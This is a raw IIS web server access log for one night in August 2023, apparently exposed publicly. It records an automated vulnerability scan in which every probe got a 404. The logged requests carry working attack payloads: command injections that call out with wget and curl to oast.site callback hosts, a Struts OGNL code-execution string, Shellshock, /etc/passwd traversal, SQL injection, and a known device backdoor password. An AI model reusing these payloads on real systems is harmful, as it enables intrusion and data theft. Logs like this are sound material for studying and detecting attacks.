????
Your IP : 18.188.83.180
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-08-04 00:00:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-08-04 00:00:35 103.153.214.94 POST /classes/Master.php f=delete_supplier 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 64
2023-08-04 00:03:06 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 186
2023-08-04 00:05:19 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 83
2023-08-04 00:13:07 103.153.214.94 POST /login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 81
2023-08-04 00:16:49 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 71
2023-08-04 00:16:56 103.153.214.94 GET /hw-sys.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 59
2023-08-04 00:19:06 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 58
2023-08-04 00:20:42 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 83
2023-08-04 00:26:28 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cj5gsq24749fn87ofdl0ud5uatias9381.oast.site) 8172 - 111.90.143.37 - - 404 7 0 81
2023-08-04 00:30:07 103.153.214.94 GET /wp-content/plugins/cab-fare-calculator/tblight.php controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 62
2023-08-04 00:30:18 103.153.214.94 POST /wp-admin/admin-ajax.php action=joomsport_md_load 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 63
2023-08-04 00:37:09 103.153.214.94 POST /wp-admin/admin-ajax.php image_id=123 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 78
2023-08-04 00:38:22 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 61
2023-08-04 00:38:28 103.153.214.94 GET /index.php s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 57
2023-08-04 00:41:07 103.153.214.94 GET /aj.html a=devi 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 62
2023-08-04 00:47:32 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 60
2023-08-04 00:47:32 103.153.214.94 POST /SamlResponseServlet - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 79
2023-08-04 00:47:39 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 80
2023-08-04 00:54:17 103.153.214.94 GET /admin/cms_channel.php del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(999999999)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 83
2023-08-04 00:56:41 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 78
2023-08-04 01:05:09 103.153.214.94 POST /assets/php/upload.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 http://bcvt.kontum.gov.vn:8172 404 7 0 88
2023-08-04 01:05:18 103.153.214.94 GET /assets/data/usrimg/2tsgvsfemm6dkaq6oyvgfe62fld.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 81
2023-08-04 01:05:51 103.153.214.94 POST /auth/requestreset - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 121
2023-08-04 01:06:00 103.153.214.94 POST /auth/requestreset - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 55
2023-08-04 01:09:33 103.153.214.94 POST /http/index.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 86
2023-08-04 01:13:00 103.153.214.94 PUT /PhoneBackup/2TSGVvACNaRoppesvj6bA7kQOHz.php - 8172 - 111.90.143.37 AVAYA - 404 7 0 127
2023-08-04 01:13:06 103.153.214.94 GET /PhoneBackup/2TSGVvACNaRoppesvj6bA7kQOHz.php - 8172 - 111.90.143.37 AVAYA - 404 7 0 65
2023-08-04 01:14:27 103.153.214.94 GET /api/experimental/patternfile order=id%3Bselect(md5(999999999))&page=0&page_size=0 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 78
2023-08-04 01:24:50 103.153.214.94 GET /wlsecurity.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 58
2023-08-04 01:25:23 103.153.214.94 GET /ajax-api/2.0/mlflow-artifacts/artifacts path=C:/ 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 55
2023-08-04 01:32:47 103.153.214.94 GET /webadmin/clientlogin/ srid&action=showdeny&url 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 80
2023-08-04 01:33:27 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 59
2023-08-04 01:38:38 103.153.214.94 GET / - 8172 - 111.90.143.37 python-requests/2.26.0 - 404 7 0 88
2023-08-04 01:38:40 103.153.214.94 POST /moveitisapi/moveitisapi.dll action=m2 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 81
2023-08-04 01:38:42 103.153.214.94 POST /guestaccess.aspx - 8172 - 111.90.143.37 python-requests/2.26.0 - 404 7 0 56
2023-08-04 01:44:38 103.153.214.94 POST /hms/user-login.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 59
2023-08-04 01:48:03 103.153.214.94 POST /cgi-bin/rpc - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 80
2023-08-04 01:58:38 103.153.214.94 GET / username=zyfwp&password=PrOw!aN_fXp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 91
2023-08-04 01:58:43 103.153.214.94 GET /ext-js/index.html - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 119
2023-08-04 02:02:55 103.153.214.94 GET /index.php rest_route=/xs-donate-form/payment-redirect/3 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 72
2023-08-04 02:04:39 103.153.214.94 GET /cgi-bin/slogin/login.py - 8172 - 111.90.143.37 ()+{+:;+};+echo+;+echo+;+/bin/cat+/etc/passwd - 404 7 0 100
2023-08-04 02:05:40 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 117
2023-08-04 02:05:47 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 119
2023-08-04 02:05:55 103.153.214.94 GET /_async/favicon.ico - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 72
2023-08-04 02:14:44 103.153.214.94 POST /saas./resttosaasservlet - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 0 85
2023-08-04 02:16:31 103.153.214.94 POST /boaform/admin/formTracert - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/diag_ping_admin_en.asp 404 7 0 55
2023-08-04 02:22:11 103.153.214.94 POST /account - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 83
2023-08-04 02:22:17 103.153.214.94 POST /account - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 80
2023-08-04 02:28:01 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 85
2023-08-04 02:28:06 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 83
2023-08-04 02:29:08 103.153.214.94 POST / name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59
2023-08-04 02:30:21 103.153.214.94 GET /anchor/errors.log - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 76
2023-08-04 02:38:58 103.153.214.94 GET /wan.htm - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 72
2023-08-04 02:40:47 103.153.214.94 GET /users/sign_in - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 62
2023-08-04 02:46:13 103.153.214.94 POST /ajaxPages/writeBrowseFilePathAjax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 56
2023-08-04 02:46:24 103.153.214.94 GET /2TSGV5qqWcmjU7jCQeYtdiYiX0j.php cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//cj5gsq24749fn87ofdl0np6qhwhs4b1pd.oast.site+-H+'User-Agent%3a+uknTmr'")}' 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 82
2023-08-04 02:46:57 103.153.214.94 POST /page/exportImport/uploadOperation.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 93
2023-08-04 02:47:06 103.153.214.94 GET /page/exportImport/fileTransfer/2TSGVSunFFVo2BR53s98kwk0j8n.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 107
2023-08-04 02:52:25 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 79
2023-08-04 02:53:33 103.153.214.94 GET /plugin - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 78
2023-08-04 03:02:36 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 59
2023-08-04 03:03:15 103.153.214.94 GET /openam/oauth2/..;/ccversion/Version - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 5 0 84
2023-08-04 03:04:53 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 81
2023-08-04 03:12:50 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 85
2023-08-04 03:13:02 103.153.214.94 DELETE /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 79
2023-08-04 03:13:14 103.153.214.94 GET /images/icons_title.gif - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 72
2023-08-04 03:18:23 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 70
2023-08-04 03:19:37 103.153.214.94 GET /metadata/v1.json - 8172 - 111.90.143.37 - - 404 7 0 60
2023-08-04 03:19:47 103.153.214.94 GET /metadata/v1.json - 8172 - 111.90.143.37 - - 404 7 0 80
2023-08-04 03:21:36 103.153.214.94 GET / - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 61
2023-08-04 03:23:22 103.153.214.94 POST /controller/ping.php - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn:8172/controller/ping.php 404 7 0 65
2023-08-04 03:36:41 103.153.214.94 GET /user.php act=login 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1+procedure+analyse(extractvalue(rand(),concat(0x7e,version())),1)--+-";s:2:"id";i:1;} 404 7 0 84
2023-08-04 03:36:47 103.153.214.94 GET /user.php act=login 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT+1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10--+-";s:2:"id";s:11:"-1'+UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca 404 7 0 82
2023-08-04 03:37:34 103.153.214.94 GET /photo/combine.php type=javascript&g=core-r7rules/../../../hello.php. 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 86
2023-08-04 03:38:59 103.153.214.94 GET /vpns/cfg/smb.conf - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 88
2023-08-04 03:43:21 103.153.214.94 GET /install - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 57
2023-08-04 03:45:15 103.153.214.94 GET / rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 59
2023-08-04 03:45:20 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/updates.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 72
2023-08-04 03:50:08 103.153.214.94 GET /api/ping count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 59
2023-08-04 03:51:33 103.153.214.94 GET /lab.html vpath=//interact.sh 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 87
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 - 119.82.130.75 - - 401 2 5 15
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 24
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20
2023-08-04 03:57:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11533781-99eb-414b-96bf-ec8de7548815;op=Sync - 200 0 0 536
2023-08-04 03:57:17 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 592
2023-08-04 03:57:17 103.153.214.94 HEAD /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 7
2023-08-04 03:58:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=11533781-99eb-414b-96bf-ec8de7548815;op=Sync - 200 0 0 61911
2023-08-04 03:58:19 103.153.214.94 POST /msdeploy.axd Site=qlk.qfoody.vn 8172 jenkins 119.82.130.75 - - 200 0 0 61940
2023-08-04 03:59:20 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 111.90.143.37 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 60
2023-08-04 03:59:28 103.153.214.94 GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 345
2023-08-04 04:03:23 103.153.214.94 POST /api/content/ - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 82
2023-08-04 04:03:23 103.153.214.94 GET /2TSGUqO5S8rji5Z6lBD1AI8vk3o.jsp - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 79
2023-08-04 04:04:17 103.153.214.94 GET /clusterList - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 81
2023-08-04 04:05:16 103.153.214.94 GET /wp-admin/install.php step=1 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 61
2023-08-04 04:08:27 103.153.214.94 POST / - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 99
2023-08-04 04:16:31 103.153.214.94 GET /rest/v1/AccountService/Accounts - 8172 - 111.90.143.37 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 76
2023-08-04 04:18:30 103.153.214.94 POST /process/aprocess.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 54
2023-08-04 04:19:49 103.153.214.94 POST /ajax/api/user/save - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 85
2023-08-04 04:22:59 103.153.214.94 POST /texteditor.php - 8172 - 111.90.143.37 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 73
